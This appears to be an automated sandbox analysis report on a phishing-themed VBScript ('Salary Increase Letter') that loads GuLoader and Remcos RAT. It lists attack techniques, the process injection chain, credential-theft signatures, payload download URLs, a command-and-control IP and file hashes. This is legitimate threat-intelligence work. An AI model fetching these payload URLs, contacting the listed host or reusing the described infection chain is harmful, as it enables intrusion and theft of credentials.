              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)412
              Process Injection              		1
              Software Packing              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares2
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts22
              Command and Scripting Interpreter              		Login HookLogin Hook1
              DLL Side-Loading              		NTDS28
              System Information Discovery              		Distributed Component Object ModelInput Capture1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell              		Network Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets141
              Security Software Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion              		Cached Domain Credentials31
              Virtualization/Sandbox Evasion              		VNCGUI Input Capture112
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
              Process Injection              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530593 Sample: Salary Increase Letter_Oct ... Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 32 ln6b9.shop 2->32 34 geoplugin.net 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 10 other signatures 2->48 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 52 Early bird code injection technique detected 8->52 54 Writes to foreign memory regions 8->54 56 Found suspicious powershell code related to unpacking or dynamic code loading 8->56 58 Queues an APC in another process (thread injection) 8->58 13 msiexec.exe 3 13 8->13         started        17 conhost.exe 8->17         started        60 VBScript performs obfuscated calls to suspicious functions 11->60 62 Suspicious powershell command line found 11->62 64 Wscript starts Powershell (via cmd or directly) 11->64 66 3 other signatures 11->66 19 powershell.exe 14 18 11->19         started        process6 dnsIp7 36 154.216.17.14, 2404, 49915, 49926 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 13->36 38 geoplugin.net 178.237.33.50, 49927, 80 ATOM86-ASATOM86NL Netherlands 13->38 68 Detected Remcos RAT 13->68 70 Tries to steal Mail credentials (via file registry) 13->70 72 Maps a DLL or memory area into another process 13->72 21 msiexec.exe 2 13->21         started        24 msiexec.exe 1 13->24         started        26 msiexec.exe 1 13->26         started        30 2 other processes 13->30 40 ln6b9.shop 104.21.2.6, 49712, 49893, 80 CLOUDFLARENETUS United States 19->40 74 Found suspicious powershell code related to unpacking or dynamic code loading 19->74 28 conhost.exe 19->28         started        signatures8 process9 signatures10 50 Tries to harvest and steal browser information (history, passwords, etc) 21->50

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Salary Increase Letter_Oct 2024.vbs11%ReversingLabs
              Salary Increase Letter_Oct 2024.vbs8%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://login.yahoo.com/config/login0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              		178.237.33.50
              		truefalse
                		unknown
                ln6b9.shop
                		104.21.2.6
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://ln6b9.shop/IBodHWPw/Kokkerering.ocxfalse
                    		unknown
                    http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.binfalse
                      		unknown
                      http://geoplugin.net/json.gpfalse
                      • URL Reputation: safe
                      		unknown
                      154.216.17.14true
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.imvu.comrmsiexec.exe, 00000007.00000002.3472489683.00000000222F0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://geoplugin.net/json.gpy2msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://aefd.nelreports.net/api/report?cat=bingthbhvF097.tmp.10.drfalse
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.binKmsiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://geoplugin.net/json.gp1msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://www.nirsoft.netmsiexec.exe, 0000000A.00000002.2643350268.00000000029C4000.00000004.00000010.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://aefd.nelreports.net/api/report?cat=bingaotakbhvF097.tmp.10.drfalse
                                    		unknown
                                    https://deff.nelreports.net/api/report?cat=msnbhvF097.tmp.10.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://geoplugin.net/json.gpxesmsiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000007.00000002.3472489683.00000000222F0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        		unknown
                                        https://www.google.commsiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                          		unknown
                                          https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELbhvF097.tmp.10.drfalse
                                            		unknown
                                            http://ln6b9.shop/IBodHWPw/Kokkerering.ocxXRpowershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.binsmsiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2467560447.0000000004381000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://geoplugin.net/json.gpImsiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhvF097.tmp.10.drfalse
                                                    		unknown
                                                    https://contoso.com/powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2325392654.000001ACF561F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://login.yahoo.com/config/loginmsiexec.exefalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.nirsoft.net/msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2303486839.000001ACE55B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2467560447.0000000004381000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhvF097.tmp.10.drfalse
                                                        		unknown
                                                        https://www.office.com/bhvF097.tmp.10.drfalse
                                                          		unknown
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2325392654.000001ACF561F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://geoplugin.net/json.gpfmsiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://geoplugin.net/json.gplmsiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.imvu.compDatamsiexec.exe, 0000000E.00000003.2617219052.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617410660.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2619527438.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617386032.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://go.micropowershell.exe, 00000002.00000002.2303486839.000001ACE6115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://geoplugin.net/json.gphymsiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://www.imvu.commsiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617219052.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617410660.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2619527438.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617386032.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://aefd.nelreports.net/api/report?cat=wsbbhvF097.tmp.10.drfalse
                                                                      		unknown
                                                                      https://contoso.com/Iconpowershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhvF097.tmp.10.drfalse
                                                                        		unknown
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://aefd.nelreports.net/api/report?cat=bingaotbhvF097.tmp.10.drfalse
                                                                            		unknown
                                                                            http://ln6b9.shoppowershell.exe, 00000002.00000002.2303486839.000001ACE71F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2303486839.000001ACE57D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2303486839.000001ACE6B15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://aefd.nelreports.net/api/report?cat=bingrmsbhvF097.tmp.10.drfalse
                                                                                		unknown
                                                                                https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                                  		unknown
                                                                                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.2303486839.000001ACE55B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bin0JdYmsiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.ebuddy.commsiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    154.216.17.14
                                                                                    		unknownSeychelles
                                                                                    		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                                                                    178.237.33.50
                                                                                    		geoplugin.netNetherlands
                                                                                    		8455ATOM86-ASATOM86NLfalse
                                                                                    104.21.2.6
                                                                                    		ln6b9.shopUnited States
                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1530593
                                                                                    Start date and time:2024-10-10 09:26:21 +02:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 24s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:15
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:Salary Increase Letter_Oct 2024.vbs
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.expl.evad.winVBS@18/10@2/3
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 66.7%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 97%
                                                                                    • Number of executed functions: 141
                                                                                    • Number of non-executed functions: 324
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .vbs

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 4900 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 948 because it is empty
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    03:27:21API Interceptor87x Sleep call for process: powershell.exe modified
                                                                                    03:28:34API Interceptor498081x Sleep call for process: msiexec.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    154.216.17.14Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      178.237.33.50PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                                      • geoplugin.net/json.gp
                                                                                      DHL AWB DOCS- 9284730932.exeGet hashmaliciousRemcosBrowse
                                                                                      • geoplugin.net/json.gp
                                                                                      MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • geoplugin.net/json.gp
                                                                                      1728486965f09c65efe9ac8095b3334d8c21391956afcf95821ee79f205e6ccc5199206ffd610.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                      • geoplugin.net/json.gp
                                                                                      n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                                                      • geoplugin.net/json.gp
                                                                                      P04562345.bat.exeGet hashmaliciousRemcosBrowse
                                                                                      • geoplugin.net/json.gp
                                                                                      SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                      • geoplugin.net/json.gp
                                                                                      nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                      • geoplugin.net/json.gp
                                                                                      6yfpZrVWQI.exeGet hashmaliciousRemcosBrowse
                                                                                      • geoplugin.net/json.gp
                                                                                      xQOrkxePXD.exeGet hashmaliciousRemcosBrowse
                                                                                      • geoplugin.net/json.gp

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      ln6b9.shopUnincriminated.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                      • 172.67.128.117
                                                                                      cJX8BV8LYG.exeGet hashmaliciousAzorultBrowse
                                                                                      • 172.67.128.117
                                                                                      4QihT6CwD8.exeGet hashmaliciousAzorultBrowse
                                                                                      • 104.21.2.6
                                                                                      Po#70831.exeGet hashmaliciousAzorultBrowse
                                                                                      • 172.67.128.117
                                                                                      geoplugin.netPO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      DHL AWB DOCS- 9284730932.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 178.237.33.50
                                                                                      1728486965f09c65efe9ac8095b3334d8c21391956afcf95821ee79f205e6ccc5199206ffd610.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      P04562345.bat.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      6yfpZrVWQI.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      xQOrkxePXD.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      ATOM86-ASATOM86NLPO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      DHL AWB DOCS- 9284730932.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 178.237.33.50
                                                                                      1728486965f09c65efe9ac8095b3334d8c21391956afcf95821ee79f205e6ccc5199206ffd610.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      P04562345.bat.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      6yfpZrVWQI.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      xQOrkxePXD.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      CLOUDFLARENETUSLogistics1.vbsGet hashmaliciousFormBookBrowse
                                                                                      • 188.114.96.3
                                                                                      Quarantined Messages(11).zipGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.17.25.14
                                                                                      https://w7950.app.blinkops.com/Get hashmaliciousUnknownBrowse
                                                                                      • 104.16.117.116
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.53.8
                                                                                      PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                                      • 188.114.96.3
                                                                                      zYlQoif21X.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                                                      • 172.67.206.204
                                                                                      MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 104.21.56.207
                                                                                      Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                                                      • 172.66.0.227
                                                                                      4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                                                      • 172.67.74.152
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.53.8
                                                                                      SKHT-ASShenzhenKatherineHengTechnologyInformationCoMV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 154.216.18.214
                                                                                      4W5Y34sRmd.exeGet hashmaliciousAsyncRATBrowse
                                                                                      • 154.216.17.207
                                                                                      P04562345.bat.exeGet hashmaliciousRemcosBrowse
                                                                                      • 154.216.17.185
                                                                                      2LgQzImW3E.elfGet hashmaliciousMiraiBrowse
                                                                                      • 156.241.11.62
                                                                                      nullnet_load.arm.elfGet hashmaliciousMiraiBrowse
                                                                                      • 156.230.19.131
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • 154.216.18.3
                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                      • 156.226.9.190
                                                                                      na.rtfGet hashmaliciousUnknownBrowse
                                                                                      • 154.216.19.160
                                                                                      Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 154.216.17.14
                                                                                      September Report 24'.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 154.216.18.214

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:Unknown
                                                                                      Category:dropped
                                                                                      Size (bytes):962
                                                                                      Entropy (8bit):5.013811273052389
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                      MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                                      SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                                      SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                                      SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                                      Malicious:false
                                                                                      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):8003
                                                                                      Entropy (8bit):4.840877972214509
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                      MD5:106D01F562D751E62B702803895E93E0
                                                                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                      Malicious:false
                                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):1.1940658735648508
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:NlllulJnp/p:NllU
                                                                                      MD5:BC6DB77EB243BF62DC31267706650173
                                                                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                      Malicious:false
                                                                                      Preview:@...e.................................X..............@..........

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jgfagqx.hls.psm1

                                                                                      Download File
